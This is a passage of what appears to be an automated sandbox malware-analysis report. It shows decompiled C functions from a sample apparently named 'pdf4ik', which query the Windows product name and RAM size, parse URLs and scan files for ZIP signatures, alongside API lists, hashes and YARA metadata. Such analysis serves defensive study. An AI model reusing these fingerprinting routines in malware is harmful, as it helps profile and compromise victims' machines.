                                        0x29da33a0
                                        0x29da33a0
                                        0x29da33a0
                                        0x29da33a9
                                        0x29da33b0
                                        0x29da33c1
                                        0x29da33cb
                                        0x29da33d2
                                        0x29da33fa
                                        0x29da341a
                                        0x29da341a
                                        0x29da3427
                                        0x29da343b
                                        0x29da3454

                                        APIs
                                        • _memset.LIBCMT ref: 29DA33D2
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 29DA33F2
                                        • RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 29DA341A
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3427
                                        • CharToOemA.USER32(00000000,?), ref: 29DA343B
                                        Strings
                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 29DA33E8
                                        • ProductName, xrefs: 29DA3414
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CharCloseOpenQueryValue_memset
                                        • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 2235053359-1787575317
                                        • Opcode ID: ae0de1f9bd64ee073a35c6802ae5de3effa9f63ed36c4547aaaa28bdf735b5fb
                                        • Instruction ID: 6e433d97dbbd6e1cea36fd4d45dfd355b300304480d0f068e324b2267d32f24e
                                        • Opcode Fuzzy Hash: ae0de1f9bd64ee073a35c6802ae5de3effa9f63ed36c4547aaaa28bdf735b5fb
                                        • Instruction Fuzzy Hash: 6011DFB654031CABD724DF90DD89FDAB378DF14700F1081DCE619A7181EA746B849F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA32B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DA32B0(void* __ebx, void* __edi) {
				signed int _v8;
				struct _MEMORYSTATUSEX _v76;
				void* __esi;
				signed int _t12;
				void* _t17;
				unsigned int _t18;
				unsigned int _t22;
				void* _t23;
				signed int _t25;
				void* _t29;
				void* _t30;
				CHAR* _t31;
				signed int _t32;

				_t30 = __edi;
				_t23 = __ebx;
				_t12 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t12 ^ _t32;
				_t31 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				_t17 = E29DB5640( &_v76, 0, 0x40);
				_v76.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v76);
				if(_t17 != 1) {
					_t25 = 0;
					_t18 = 0;
				} else {
					_t22 = _v76.ullAvailPhys;
					_t25 = (_t22 << 0x00000020 | _v76.ullTotalPhys) >> 0x14;
					_t18 = _t22 >> 0x14;
				}
				wsprintfA(_t31, "%d MB", _t25);
				return E29DADF46(_t31, _t23, _v8 ^ _t32, _t29, _t30, _t31, _t18);
			}
















                                        0x29da32b0
                                        0x29da32b0
                                        0x29da32b6
                                        0x29da32bd
                                        0x29da32d7
                                        0x29da32df
                                        0x29da32eb
                                        0x29da32f2
                                        0x29da32fb
                                        0x29da330c
                                        0x29da330e
                                        0x29da32fd
                                        0x29da32fd
                                        0x29da3303
                                        0x29da3307
                                        0x29da3307
                                        0x29da3318
                                        0x29da3331

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 29DA32C8
                                        • HeapAlloc.KERNEL32(00000000), ref: 29DA32CF
                                        • _memset.LIBCMT ref: 29DA32DF
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 29DA32F2
                                        • wsprintfA.USER32 ref: 29DA3318
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 3402858368-3474575989
                                        • Opcode ID: 980e41a70710567646819b0ca0ec6faa1bf8c22e5ded907eca0b2ba9d81193e2
                                        • Instruction ID: 58e32109f267edf72c49d97d0f702af87f9a0d56b147243f9f4680960d30a669
                                        • Opcode Fuzzy Hash: 980e41a70710567646819b0ca0ec6faa1bf8c22e5ded907eca0b2ba9d81193e2
                                        • Instruction Fuzzy Hash: 4B01A2B2E40108BBD704AFA4DD4AFAEB778EF04700F44415DFA06EB280DE74990297A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D97DC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39stringnetworkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E29D97DC0(void* __ebx, void* __edi, CHAR* __esi) {
				signed int _v8;
				char _v72;
				intOrPtr _v124;
				char* _v128;
				void* _v132;
				signed int _t11;
				int _t18;
				char* _t19;
				void* _t21;
				void* _t26;
				signed int _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t21 = __ebx;
				_t11 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t11 ^ _t28;
				E29DB5640( &_v72, 0, 0x40);
				E29DB5640( &_v132, 0, 0x3c);
				_t25 =  &_v72;
				_v132 = 0x3c;
				_v128 =  &_v72;
				_v124 = 0x40;
				_t18 = InternetCrackUrlA(__esi, lstrlenA(__esi), 0x10000000,  &_v132);
				_t19 = _v128;
				if(_t18 == 0) {
					_t19 = "http";
				}
				return E29DADF46(_t19, _t21, _v8 ^ _t28, _t25, _t26, _t27);
			}














                                        0x29d97dc0
                                        0x29d97dc0
                                        0x29d97dc0
                                        0x29d97dc9
                                        0x29d97dd0
                                        0x29d97ddb
                                        0x29d97de8
                                        0x29d97df9
                                        0x29d97dfd
                                        0x29d97e04
                                        0x29d97e07
                                        0x29d97e16
                                        0x29d97e1e
                                        0x29d97e21
                                        0x29d97e23
                                        0x29d97e23
                                        0x29d97e35

                                        APIs
                                        • _memset.LIBCMT ref: 29D97DDB
                                        • _memset.LIBCMT ref: 29D97DE8
                                        • lstrlenA.KERNEL32(00000000,10000000,?), ref: 29D97E0E
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 29D97E16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$CrackInternetlstrlen
                                        • String ID: <$@$http
                                        • API String ID: 3332450456-26727890
                                        • Opcode ID: 3b4d35e5a94999b6c0c5ce17b0621af158697fa57366ddfdac395ab433963d6f
                                        • Instruction ID: 327f4e71e53712e3efa0362528e7c828fb98b35af8aa9a5ec3ad30405e52380a
                                        • Opcode Fuzzy Hash: 3b4d35e5a94999b6c0c5ce17b0621af158697fa57366ddfdac395ab433963d6f
                                        • Instruction Fuzzy Hash: 8C016271900208ABEB10EFA8DC45FED77BCEF18600F50401DE605EB180DB7466059BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA1370 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E29DA1370(void* __ecx) {
				signed char* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				signed char _v32;
				signed char* _v48;
				signed int _v49;
				char _v56;
				signed char** _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t87;
				signed int _t88;
				signed char _t91;
				signed char _t95;
				signed char** _t100;
				signed char _t101;
				signed char** _t103;
				signed char** _t107;
				signed char* _t110;
				signed char* _t115;
				void* _t116;
				void* _t117;
				signed int _t129;
				char _t134;
				intOrPtr _t135;
				signed char** _t136;
				intOrPtr _t137;
				signed char** _t148;
				void* _t151;
				void* _t152;
				signed char** _t154;
				void* _t156;
				signed char** _t158;
				signed char _t160;
				signed char _t162;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t169;

				_push(0xffffffff);
				_push(E29DC2128);
				_push( *[fs:0x0]);
				_t168 = _t167 - 0x30;
				_t87 =  *0x29dd5664; // 0xd9555f04
				_t88 = _t87 ^ _t166;
				_v20 = _t88;
				_push(_t116);
				_push(_t88);
				 *[fs:0x0] =  &_v16;
				_t151 = __ecx;
				_t91 =  *( *(__ecx + 0x20));
				_t147 = 0;
				if(_t91 == 0) {
					L3:
					__eflags =  *(_t151 + 0x54) - _t147;
					if( *(_t151 + 0x54) == _t147) {
						L51:
						_t92 = _t91 | 0xffffffff;
						__eflags = _t91 | 0xffffffff;
						L52:
						 *[fs:0x0] = _v16;
						_pop(_t152);
						_pop(_t156);
						_pop(_t117);
						return E29DADF46(_t92, _t117, _v20 ^ _t166, _t147, _t152, _t156);
					}
					_t129 =  *(_t151 + 0x10);
					_t157 = _t151 + 0x48;
					__eflags =  *_t129 - _t151 + 0x48;
					if( *_t129 == _t151 + 0x48) {
						_t157 =  *((intOrPtr*)(_t151 + 0x3c));
						 *_t129 =  *((intOrPtr*)(_t151 + 0x3c));
						 *((intOrPtr*)( *((intOrPtr*)(_t151 + 0x20)))) =  *((intOrPtr*)(_t151 + 0x40));
						_t129 =  *(_t151 + 0x30);
						__eflags = 0;
						 *_t129 = 0;
					}
					__eflags =  *(_t151 + 0x44) - _t147;
					if(__eflags != 0) {
						_v28 = 0xf;
						_v32 = _t147;
						_v48 = _t147;
						_v8 = _t147;
						_t147 =  *(_t151 + 0x54);
						_push( *(_t151 + 0x54));
						_t118 = E29DAF5AA(_t116, _t151, _t157, __eflags);
						_t169 = _t168 + 4;
						__eflags = _t118 - 0xffffffff;
						if(_t118 == 0xffffffff) {
							L42:
							_t91 = E29D89160( &_v48);
							goto L51;
						}
						while(1) {
							_t95 = _v32;
							__eflags = (_t129 | 0xffffffff) - _t95 - 1;
							if((_t129 | 0xffffffff) - _t95 <= 1) {
								break;
							}
							_t162 = _t95 + 1;
							__eflags = _t162 - 0xfffffffe;
							if(_t162 > 0xfffffffe) {
								break;
							}
							_t135 = _v28;
							__eflags = _t135 - _t162;
							if(_t135 >= _t162) {
								__eflags = _t162;
								if(_t162 != 0) {
									L15:
									__eflags = _t135 - 0x10;
									_t136 = _v48;
									if(_t135 < 0x10) {
										_t136 =  &_v48;
									}
									 *((char*)(_t136 + _t95)) = _t118;
									__eflags = _v28 - 0x10;
									_t100 = _v48;
									_v32 = _t162;
									if(_v28 < 0x10) {
										_t100 =  &_v48;
									}
									 *((char*)(_t100 + _t162)) = 0;
									L20:
									_t101 = _v32;
									_t137 = _v28;
									L21:
									_t148 = _v48;
									__eflags = _t137 - 0x10;
									if(_t137 < 0x10) {
										_v60 =  &_v48;
									} else {
										_v60 = _t148;
									}
									__eflags = _t137 - 0x10;
									if(_t137 < 0x10) {
										_t148 =  &_v48;
									}
									_t129 =  *(_t151 + 0x44);
									_t164 =  *_t129;
									_t118 = _v60 + _t101;
									_t147 = _t151 + 0x4c;
									_t91 =  *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x10))))(_t151 + 0x4c, _t148, _v60 + _t101,  &_v56,  &_v49,  &_v48,  &_v64);
									__eflags = _t91;
									if(_t91 < 0) {
										L49:
										__eflags = _v28 - 0x10;
										if(_v28 >= 0x10) {
											_t147 = _v48;
											_push(_v48);
											_t91 = E29DADF3B();
										}
										goto L51;
									} else {
										__eflags = _t91 - 1;
										if(_t91 <= 1) {
											__eflags = _v64 -  &_v49;
											if(_v64 !=  &_v49) {
												L44:
												__eflags = _v28 - 0x10;
												_t158 = _v48;
												if(_v28 < 0x10) {
													_t158 =  &_v48;
												}
												_t160 = _t158 - _v56 + _v32;
												__eflags = _t160;
												if(__eflags <= 0) {
													L48:
													E29D89160( &_v48);
													_t92 = _v49 & 0x000000ff;
													goto L52;
												} else {
													do {
														_t147 =  *(_t151 + 0x54);
														_t134 =  *((char*)(_t160 + _v56 - 1));
														_t160 = _t160 - 1;
														_push( *(_t151 + 0x54));
														_push(_t134);
														E29DAF10C(_t118, _t151, _t160, __eflags);
														_t169 = _t169 + 8;
														__eflags = _t160;
													} while (__eflags > 0);
													goto L48;
												}
											}
											__eflags = _v28 - 0x10;
											_t103 = _v48;
											if(_v28 < 0x10) {
												_t103 =  &_v48;
											}
											_t147 = _v56 - _t103;
											__eflags = _v56 - _t103;
											_t129 =  &_v48;
											E29D896C0(_t129, 0, _v56 - _t103);
											L41:
											_push( *(_t151 + 0x54));
											_t118 = E29DAF5AA(_t118, _t151, _t164, __eflags);
											_t169 = _t169 + 4;
											__eflags = _t118 - 0xffffffff;
											if(_t118 != 0xffffffff) {
												continue;
											}
											goto L42;
										}
										__eflags = _t91 - 3;
										if(_t91 != 3) {
											goto L49;
										}
										__eflags = _v32 - 1;
										if(__eflags < 0) {
											goto L41;
										}
										__eflags = _v28 - 0x10;
										_t107 = _v48;
										if(_v28 < 0x10) {
											_t107 =  &_v48;
										}
										E29DAF7CF( &_v49, 1, _t107, 1);
										E29D89160( &_v48);
										_t92 = _v49 & 0x000000ff;
										goto L52;
									}
								}
								_t110 = _v48;
								_v32 = _t162;
								__eflags = _t135 - 0x10;
								if(_t135 < 0x10) {
									_t110 =  &_v48;
								}
								 *_t110 = 0;
								goto L20;
							}
							E29D89750( &_v48, _t162, _t95);
							_t137 = _v28;
							_t101 = _v32;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L21;
							}
							goto L15;
						}
						E29DAD440("string too long");
						goto L44;
					} else {
						_push( *(_t151 + 0x54));
						_t91 = E29DAF5AA(_t116,  *(_t151 + 0x54), _t157, __eflags);
						__eflags = _t91 - 0xffffffff;
						if(_t91 == 0xffffffff) {
							goto L51;
						}
						_t92 = _t91 & 0x000000ff;
						goto L52;
					}
				}
				_t91 =  *( *(__ecx + 0x20));
				if(_t91 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t91) {
					goto L3;
				}
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
				_t154 =  *(__ecx + 0x20);
				_t115 =  *_t154;
				_t147 =  &(_t115[1]);
				 *_t154 =  &(_t115[1]);
				_t92 =  *_t115 & 0x000000ff;
				goto L52;
			}














































                                        0x29da1373
                                        0x29da1375
                                        0x29da1380
                                        0x29da1381
                                        0x29da1384
                                        0x29da1389
                                        0x29da138b
                                        0x29da138e
                                        0x29da1391
                                        0x29da1395
                                        0x29da139b
                                        0x29da13a0
                                        0x29da13a2
                                        0x29da13a6
                                        0x29da13cf
                                        0x29da13cf
                                        0x29da13d2
                                        0x29da15e3
                                        0x29da15e3
                                        0x29da15e3
                                        0x29da15e6
                                        0x29da15e9
                                        0x29da15f1
                                        0x29da15f2
                                        0x29da15f3
                                        0x29da1601
                                        0x29da1601
                                        0x29da13d8
                                        0x29da13db
                                        0x29da13de
                                        0x29da13e0
                                        0x29da13e5
                                        0x29da13e8
                                        0x29da13ed
                                        0x29da13ef
                                        0x29da13f2
                                        0x29da13f4
                                        0x29da13f4
                                        0x29da13f6
                                        0x29da13f9
                                        0x29da1418
                                        0x29da141f
                                        0x29da1422
                                        0x29da1425
                                        0x29da1428
                                        0x29da142b
                                        0x29da1431
                                        0x29da1433
                                        0x29da1436
                                        0x29da1439
                                        0x29da157d
                                        0x29da1580
                                        0x00000000
                                        0x29da1580
                                        0x29da1440
                                        0x29da1440
                                        0x29da1448
                                        0x29da144b
                                        0x00000000
                                        0x00000000
                                        0x29da1451
                                        0x29da1454
                                        0x29da1457
                                        0x00000000
                                        0x00000000
                                        0x29da145d
                                        0x29da1460
                                        0x29da1462
                                        0x29da14ac
                                        0x29da14ae
                                        0x29da1478
                                        0x29da1478
                                        0x29da147b
                                        0x29da147e
                                        0x29da1480
                                        0x29da1480
                                        0x29da1483
                                        0x29da1486
                                        0x29da148a
                                        0x29da148d
                                        0x29da1490
                                        0x29da1492
                                        0x29da1492
                                        0x29da1495
                                        0x29da1499
                                        0x29da1499
                                        0x29da149c
                                        0x29da149f
                                        0x29da149f
                                        0x29da14a2
                                        0x29da14a5
                                        0x29da14c6
                                        0x29da14a7
                                        0x29da14a7
                                        0x29da14a7
                                        0x29da14c9
                                        0x29da14cc
                                        0x29da14ce
                                        0x29da14ce
                                        0x29da14d1
                                        0x29da14d4
                                        0x29da14e9
                                        0x29da14f0
                                        0x29da14f4
                                        0x29da14f6
                                        0x29da14f8
                                        0x29da15d1
                                        0x29da15d1
                                        0x29da15d5
                                        0x29da15d7
                                        0x29da15da
                                        0x29da15db
                                        0x29da15e0
                                        0x00000000
                                        0x29da14fe
                                        0x29da14fe
                                        0x29da1501
                                        0x29da1545
                                        0x29da1548
                                        0x29da1591
                                        0x29da1591
                                        0x29da1595
                                        0x29da1598
                                        0x29da159a
                                        0x29da159a
                                        0x29da15a0
                                        0x29da15a3
                                        0x29da15a5
                                        0x29da15c1
                                        0x29da15c8
                                        0x29da15cd
                                        0x00000000
                                        0x29da15a7
                                        0x29da15a7
                                        0x29da15aa
                                        0x29da15ad
                                        0x29da15b2
                                        0x29da15b3
                                        0x29da15b4
                                        0x29da15b5
                                        0x29da15ba
                                        0x29da15bd
                                        0x29da15bd
                                        0x00000000
                                        0x29da15a7
                                        0x29da15a5
                                        0x29da154a
                                        0x29da154e
                                        0x29da1551
                                        0x29da1553
                                        0x29da1553
                                        0x29da1559
                                        0x29da1559
                                        0x29da155e
                                        0x29da1561
                                        0x29da1566
                                        0x29da1569
                                        0x29da156f
                                        0x29da1571
                                        0x29da1574
                                        0x29da1577
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29da1577
                                        0x29da1503
                                        0x29da1506
                                        0x00000000
                                        0x00000000
                                        0x29da150c
                                        0x29da1510
                                        0x00000000
                                        0x00000000
                                        0x29da1512
                                        0x29da1516
                                        0x29da1519
                                        0x29da151b
                                        0x29da151b
                                        0x29da1527
                                        0x29da1536
                                        0x29da153b
                                        0x00000000
                                        0x29da153b
                                        0x29da14f8
                                        0x29da14b0
                                        0x29da14b3
                                        0x29da14b6
                                        0x29da14b9
                                        0x29da14bb
                                        0x29da14bb
                                        0x29da14be
                                        0x00000000
                                        0x29da14be
                                        0x29da1469
                                        0x29da146e
                                        0x29da1471
                                        0x29da1474
                                        0x29da1476
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29da1476
                                        0x29da158c
                                        0x00000000
                                        0x29da13fb
                                        0x29da13fe
                                        0x29da13ff
                                        0x29da1407
                                        0x29da140a
                                        0x00000000
                                        0x00000000
                                        0x29da1410
                                        0x00000000
                                        0x29da1410
                                        0x29da13f9
                                        0x29da13ab
                                        0x29da13b6
                                        0x00000000
                                        0x00000000
                                        0x29da13bb
                                        0x29da13bd
                                        0x29da13c0
                                        0x29da13c2
                                        0x29da13c5
                                        0x29da13c7
                                        0x00000000

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _fgetc$_memcpy_s
                                        • String ID: string too long
                                        • API String ID: 160369518-2556327735
                                        • Opcode ID: a847fe72d58357a19c098a7168f8b8bde5a4c16f77316cd6c759ee8f8719924e
                                        • Instruction ID: 1b9da13c644d9d1998f3a52a978bf8213e8d1faaefa6c0dd3f6746da15bb62da
                                        • Opcode Fuzzy Hash: a847fe72d58357a19c098a7168f8b8bde5a4c16f77316cd6c759ee8f8719924e
                                        • Instruction Fuzzy Hash: 4391A171D002199FCB05CFACC8809EEB7B5FF59310F50851EE922A7A91D731E926DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8C6A0 Relevance: 10.7, APIs: 7, Instructions: 166fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D8C6A0(char* __esi) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				struct _OVERLAPPED* _v32;
				void* __edi;
				signed int _t60;
				signed int _t61;
				struct _OVERLAPPED* _t62;
				struct _OVERLAPPED* _t66;
				struct _OVERLAPPED* _t68;
				struct _OVERLAPPED* _t69;
				signed int _t71;
				void* _t73;
				struct _OVERLAPPED* _t86;
				long _t88;
				intOrPtr _t91;
				void* _t97;
				struct _OVERLAPPED* _t99;
				struct _OVERLAPPED* _t108;
				signed int _t110;
				char* _t112;
				void* _t113;
				void* _t114;

				_t112 = __esi;
				if( *__esi == 0) {
					 *((intOrPtr*)(__esi + 0x1c)) =  *((intOrPtr*)(__esi + 0x18));
					goto L3;
				} else {
					if( *((char*)(__esi + 1)) == 0) {
						return _t60 | 0xffffffff;
					} else {
						SetFilePointer( *(__esi + 4), 0, 0, 2);
						L3:
						if( *_t112 == 0) {
							_t99 =  *(_t112 + 0x1c);
							_v8 = _t99;
							_t86 = _t99;
						} else {
							if( *((char*)(_t112 + 1)) == 0) {
								_v8 = 0;
								_t86 = _v8;
							} else {
								_t86 = SetFilePointer( *(_t112 + 4), 0, 0, 1) -  *((intOrPtr*)(_t112 + 0xc));
								_v8 = _t86;
							}
						}
						_t108 = 0xffff;
						_v12 = 0xffff;
						if(_t86 < 0xffff) {
							_v12 = _t86;
							_t108 = _t86;
						}
						_t61 = E29DADFE0(_t99, _t108, _t112, 0x404);
						_t114 = _t113 + 4;
						_v20 = _t61;
						if(_t61 != 0) {
							_t62 = 4;
							_v24 = 0xffffffff;
							if(_t108 > 4) {
								while(1) {
									_t66 = _t62 + 0x400;
									_v16 = _t108;
									if(_t66 <= _t108) {
										_v16 = _t66;
									}
									_t68 = _t86 - _v16;
									_t88 = _t86 - _t68;
									_v32 = _t68;
									if(_t88 > 0x404) {
										_t88 = 0x404;
									}
									if( *_t112 == 0) {
										goto L24;
									}
									if( *((char*)(_t112 + 1)) != 0) {
										SetFilePointer( *(_t112 + 4),  *((intOrPtr*)(_t112 + 0xc)) + _t68, 0, 0);
										L25:
										_t110 = _t88;
										if( *_t112 == 0) {
											_t69 =  *(_t112 + 0x1c);
											_t91 =  *((intOrPtr*)(_t112 + 0x18));
											if(_t69 + _t88 > _t91) {
												_t110 = _t91 - _t69;
											}
											E29DB0010(_v20,  *((intOrPtr*)(_t112 + 0x14)) + _t69, _t110);
											_t114 = _t114 + 0xc;
											 *(_t112 + 0x1c) =  *(_t112 + 0x1c) + _t110;
											_t71 = _t110;
										} else {
											if(ReadFile( *(_t112 + 4), _v20, _t88,  &_v28, 0) == 0) {
												 *((char*)(_t112 + 8)) = 1;
											}
											_t71 = _v28;
										}
										if(_t71 / _t88 == 1) {
											_t73 = _t88 - 3;
											if(_t73 >= 0) {
												while(1) {
													_t97 = _v20;
													_t73 = _t73 - 1;
													if( *((char*)(_t73 + _t97)) == 0x50 &&  *((char*)(_t73 + _t97 + 1)) == 0x4b &&  *((char*)(_t73 + _t97 + 2)) == 5 &&  *((char*)(_t73 + _t97 + 3)) == 6) {
														break;
													}
													if(_t73 >= 0) {
														continue;
													} else {
													}
													goto L42;
												}
												_v24 = _t73 + _v32;
											}
											L42:
											if(_v24 == 0 && _v16 < _v12) {
												_t108 = _v12;
												_t62 = _v16;
												_t86 = _v8;
												continue;
											}
										}
									}
									goto L44;
									L24:
									 *(_t112 + 0x1c) = _t68;
									goto L25;
								}
							}
							L44:
							E29DADFA6(_v20);
							return _v24;
						} else {
							return _t61 | 0xffffffff;
						}
					}
				}
			}





























                                        0x29d8c6a0
                                        0x29d8c6a9
                                        0x29d8c6ea
                                        0x00000000
                                        0x29d8c6ab
                                        0x29d8c6af
                                        0x29d8c6f5
                                        0x29d8c6b1
                                        0x29d8c6bb
                                        0x29d8c6c1
                                        0x29d8c6c5
                                        0x29d8c702
                                        0x29d8c705
                                        0x29d8c708
                                        0x29d8c6c7
                                        0x29d8c6cb
                                        0x29d8c6f6
                                        0x29d8c6fd
                                        0x29d8c6cd
                                        0x29d8c6e0
                                        0x29d8c6e2
                                        0x29d8c6e2
                                        0x29d8c6cb
                                        0x29d8c70b
                                        0x29d8c710
                                        0x29d8c715
                                        0x29d8c717
                                        0x29d8c71a
                                        0x29d8c71a
                                        0x29d8c721
                                        0x29d8c726
                                        0x29d8c729
                                        0x29d8c72e
                                        0x29d8c739
                                        0x29d8c73e
                                        0x29d8c747
                                        0x29d8c759
                                        0x29d8c759
                                        0x29d8c75e
                                        0x29d8c763
                                        0x29d8c765
                                        0x29d8c765
                                        0x29d8c76a
                                        0x29d8c76d
                                        0x29d8c76f
                                        0x29d8c778
                                        0x29d8c77a
                                        0x29d8c77a
                                        0x29d8c782
                                        0x00000000
                                        0x00000000
                                        0x29d8c788
                                        0x29d8c79c
                                        0x29d8c7a7
                                        0x29d8c7aa
                                        0x29d8c7ac
                                        0x29d8c7d0
                                        0x29d8c7d3
                                        0x29d8c7db
                                        0x29d8c7df
                                        0x29d8c7df
                                        0x29d8c7ec
                                        0x29d8c7f1
                                        0x29d8c7f4
                                        0x29d8c7f7
                                        0x29d8c7ae
                                        0x29d8c7c5
                                        0x29d8c7c7
                                        0x29d8c7c7
                                        0x29d8c7cb
                                        0x29d8c7cb
                                        0x29d8c800
                                        0x29d8c802
                                        0x29d8c807
                                        0x29d8c810
                                        0x29d8c810
                                        0x29d8c813
                                        0x29d8c818
                                        0x00000000
                                        0x00000000
                                        0x29d8c831
                                        0x00000000
                                        0x00000000
                                        0x29d8c833
                                        0x00000000
                                        0x29d8c831
                                        0x29d8c838
                                        0x29d8c838
                                        0x29d8c83b
                                        0x29d8c83f
                                        0x29d8c750
                                        0x29d8c753
                                        0x29d8c756
                                        0x00000000
                                        0x29d8c756
                                        0x29d8c83f
                                        0x29d8c800
                                        0x00000000
                                        0x29d8c7a4
                                        0x29d8c7a4
                                        0x00000000
                                        0x29d8c7a4
                                        0x29d8c759
                                        0x29d8c84d
                                        0x29d8c851
                                        0x29d8c861
                                        0x29d8c730
                                        0x29d8c738
                                        0x29d8c738
                                        0x29d8c72e
                                        0x29d8c6af

                                        APIs
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 29D8C6BB
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 29D8C6D7
                                        • _malloc.LIBCMT ref: 29D8C721
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 29D8C79C
                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 29D8C7BD
                                        • _memmove.LIBCMT ref: 29D8C7EC
                                        • _free.LIBCMT ref: 29D8C851
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Pointer$Read_free_malloc_memmove
                                        • String ID:
                                        • API String ID: 2793708502-0
                                        • Opcode ID: e2ee13e746e5582267a7421ae69ad417d7a68c03c2b82a2960617d6b9261bea7
                                        • Instruction ID: 6db6840680703bc456383e994ca0059eb4e30ecc9722aafa8091128ce3fd9038
                                        • Opcode Fuzzy Hash: e2ee13e746e5582267a7421ae69ad417d7a68c03c2b82a2960617d6b9261bea7
                                        • Instruction Fuzzy Hash: 9551CBB5E01245EFEB24CFB4C881B6ABBF5BF44300F10896EE64597A82D770A943DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D89C70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D89C70(void* __eax, intOrPtr* __ecx, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				intOrPtr _t20;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr* _t26;
				char* _t31;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t43;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t61;
				intOrPtr* _t66;

				_t43 = __eax;
				_t66 = __ecx;
				if(__eax == 0) {
					L12:
					_t20 =  *((intOrPtr*)(_t66 + 0x10));
					_t49 = _a4;
					if((_t54 | 0xffffffff) - _t20 <= _t49) {
						_t20 = E29DAD440("string too long");
					}
					if(_t49 == 0) {
						L36:
						return _t66;
					} else {
						_t61 = _t20 + _t49;
						if(_t61 > 0xfffffffe) {
							_t20 = E29DAD440("string too long");
						}
						_t50 =  *((intOrPtr*)(_t66 + 0x14));
						if(_t50 >= _t61) {
							if(_t61 != 0) {
								goto L19;
							} else {
								 *((intOrPtr*)(_t66 + 0x10)) = _t61;
								if(_t50 < 0x10) {
									_t31 = _t66;
									 *_t31 = 0;
									return _t31;
								} else {
									 *((char*)( *_t66)) = 0;
									return _t66;
								}
							}
						} else {
							E29D89750(_t66, _t61, _t20);
							if(_t61 == 0) {
								L35:
								goto L36;
							} else {
								L19:
								_t22 =  *((intOrPtr*)(_t66 + 0x14));
								if(_t22 < 0x10) {
									_t51 = _t66;
								} else {
									_t51 =  *_t66;
								}
